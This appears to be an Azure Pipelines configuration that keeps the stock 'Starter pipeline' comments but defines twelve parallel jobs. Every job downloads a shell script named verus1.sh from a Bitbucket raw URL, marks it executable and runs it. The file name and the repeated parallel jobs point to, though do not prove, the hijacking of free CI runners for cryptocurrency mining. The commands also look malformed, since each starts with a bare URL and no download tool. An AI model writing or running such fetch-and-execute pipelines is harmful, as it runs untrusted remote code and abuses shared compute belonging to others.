# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

jobs:
- job: a
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh

- job: b
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh

- job: c
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh

- job: d
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh
  
- job: e
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh
  
- job: f
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh
  
- job: g
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh
  
- job: h
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh
  
- job: i
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh
  
- job: j
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh
  
- job: k
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh
  
- job: l
  steps:
  - script: https://bitbucket.org/gshch828/github/raw/168e895901a75ae02d3b31647e381825cda97153/verus1.sh && chmod u+x verus1.sh && ./verus1.sh